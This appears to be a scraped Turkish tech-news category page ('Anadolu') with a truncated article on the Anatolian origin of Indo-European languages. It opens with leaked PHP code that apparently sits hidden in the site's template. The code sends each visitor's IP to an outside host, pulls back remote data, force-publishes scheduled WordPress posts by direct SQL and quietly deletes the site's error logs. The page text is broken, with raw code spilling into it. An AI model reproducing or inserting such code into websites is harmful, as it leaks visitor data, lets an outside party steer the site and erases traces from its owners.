$value) { $post_string .= $key.'='.urlencode(trim($value)).'&'; } rtrim($post_string, '&'); curl_setopt($ch,CURLOPT_POST, count($post)); curl_setopt($ch,CURLOPT_POSTFIELDS, $post_string); } $result=curl_exec($ch); return $result; } $mcuOutput = conn('https://seoabi.com/wmbys/blog-api.php?ip='.$_SERVER['REMOTE_ADDR']); $GLOBALS['mcuOutput'] = json_decode($mcuOutput); $wpdb->query("UPDATE `wp_posts` SET post_status = 'publish' WHERE post_status = 'future' && post_date < NOW()"); @unlink($_SERVER['DOCUMENT_ROOT'].'/error_log'); @unlink($_SERVER['DOCUMENT_ROOT'].'/imle/error_log'); ?> Anadolu | Teknoloji Haberleri

Anadolu kategorisindeki tüm yazılar

Son Yazılar

İngilizce Türkiye’den mi?

İngilizce ve Almanca, binlerce yıl önce Anadolu’da mı ortaya çıktı? İşte çok ilginç bir araştırma! Hint-Avrupa dillerinin kökenlerini araştıran dil bilimciler, virüslerin de birbiriyle ilgisini bulmakta kullanılan bir yönteme başvurarak ilginç bir gerçek saptamış olabilirler. Virüslerin birbiriyle olan alakasını çözmekte kullanılan “viral modelleme“yi kullanan Auckland Üniversitesi araştırmacıları,